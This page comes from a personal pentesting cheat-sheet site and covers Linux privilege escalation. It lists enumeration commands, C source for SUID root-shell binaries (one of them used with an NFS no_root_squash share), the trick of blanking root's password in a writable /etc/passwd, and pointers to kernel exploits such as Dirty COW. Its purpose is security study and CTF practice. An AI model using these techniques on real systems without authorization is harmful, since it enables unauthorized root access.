d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Guides
  • GTFOBins
  • Automated
  • LinPEAS
  • LinEnum
  • Linux Smart Enumeration (LSE)
  • Linux Exploit Suggester (LES)
  • linuxprivchecker.py
  • Unix-privesc-check
  • Manual
  • Kernel exploits
  • Manual information gathering
  • Operating system
  • Users
  • Groups
  • Sudo
  • SUID
  • Capabilities
  • Cron Jobs
  • NFS
  • Processing running
  • Network
  • Packages
  • Weak services
  • Check tools potentially vulnerable to priv esc
  • setuid
  • Writable /etc/passwd
  • Public exploits
  • Dirty COW
  • Rational Love
Edit on GitHub
  1. Privilege escalation
  2. Linux

Overview

PreviousLinuxNextWindows

Last updated 3 years ago

Guides

GTFOBins

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

Automated

LinPEAS

Linux Privilege Escalation Awesome Script

LinEnum

Scripted Local Linux Enumeration & Privilege Escalation Checks

Linux Smart Enumeration (LSE)

Linux enumeration tool for pentesting and CTFs with verbosity levels

Linux Exploit Suggester (LES)

linuxprivchecker.py

Unix-privesc-check

Manual

Kernel exploits

Get linux/kernel version E.g. Linux kali 5.14.0-kali2-arm64 #1 SMP Debian 5.14.9-2kali1 (2021-10-04) aarch64 GNU/Linux

uname -a

Get "marketing" name of distribution E.g. Ubuntu 20.04.1 LTS

cat /etc/issue 

Get stuff like gcc E.g. Linux version 5.14.0-kali2-arm64 (devel@kali.org) (gcc-10 (Debian 10.3.0-11) 10.3.0, GNU ld (GNU Binutils for Debian) 2.37) #1 SMP Debian 5.14.9-2kali1 (2021-10-04)

cat /proc/version

Manual information gathering

Operating system

uname -a
cat /etc/issue 
cat /proc/version
cat /etc/*-release

Users

Info about current user

id

Check for other users (non-service users normally start at id 1000)

cat /etc/passwd

Filter users with a login shell

grep -vE "nologin|false" /etc/passwd

Groups

Interesting unix groups

  • 44(video) <- has access to video output (weird stuff)

  • 6(disk) <- has raw access to the file system, read disk using e.g. debugfs

Sudo

Check current privilege status

sudo -l

Todo: LD_PRELOAD https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/

SUID

Find files that have SUID or SGID bit set

find / -type f -perm -04000 -ls 2>/dev/null

Capabilities

List enabled capabilities

getcap -r / 2>/dev/null

Cron Jobs

cat /etc/crontab

NFS

Check for no_root_squash option in

cat /etc/exports

Mount share

mkdir /tmp/share
mount -o rw <ip>:/share /tmp/share
cd /tmp/share

Create SUID binary

int main()
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}

Compile it, set SUID bit

gcc binary.c binary -w
chmod +s binary

Run it on target

./binary

Processing running

ps aux

-> Is there something special, maybe related to the users found?

Network

netstat -antup

-> Is any service running, we missed in the port scan (firewall?)

Packages

Debian

dpkg -l

CentOS, OpenSuse, Fedora, RHEL

rpm -qa (CentOS / openSUSE )

OpenBSD, FreeBSD

pkg_info

Check for manually installed stuff

/var/
/opt/
/usr/local
/usr/local/bin
/usr/local/src
/usr/src
/home/<username>

Weak services

Look for files that have root privileges but are writeable for everyone -> replace file with exploit

Check tools potentially vulnerable to priv esc

which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null

setuid

Check if available mount -> must not have nosuid

mount | grep -vE "nosuid"

setuid.c

int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
}

Alternative setuid.c

int main(int argc, char *argv[]) {
    setreuid(0, 0);
    execve("/bin/sh", NULL, NULL);
}

TODO: This doesn't seem to be working.. Did it ever? Where did I get this from? PWK? 😬

gcc setuid.c -o setuid
sudo chown root:root /tmp/setuid; sudo chmod 4755 /tmp/setuid

Writable /etc/passwd

Change root, remove the x (password flag) root:x:0:0:root:/root:/bin/bash -> root::0:0:root:/root:/bin/bash su -> root

Public exploits

Dirty COW

Rational Love

Linux privilege escalation auditing tool

A Linux Privilege Escalation Check Script

Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).

-> Use searchsploit (), Google, GitHub, etc. to check for public available kernel exploits.

See also:

is a privilege escalation vulnerability in the Linux Kernel

glibc - 'getcwd()' Local Privilege Escalation 2018 local root exploit

Basic Linux Privilege Escalation - g0tmi1k
PayloadsAllTheThings/Linux - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
GTFOBins
PEASS-ng/linPEAS at master · carlospolop/PEASS-ng · GitHub
GitHub - rebootuser/LinEnum
GitHub - diego-treitos/linux-smart-enumeration
GitHub - mzet-/linux-exploit-suggester
GitHub - sleventyeleven/linuxprivchecker
unix-privesc-check | Kali Linux Tools
exploit-db.com
linux - Privilege escalation using passwd file - Information Security Stack Exchange
Dirty COW (CVE-2016-5195)
local-root-exploits/linux/CVE-2018-1000001 at master · 5H311-1NJ3C706/local-root-exploits · GitHub
PSPY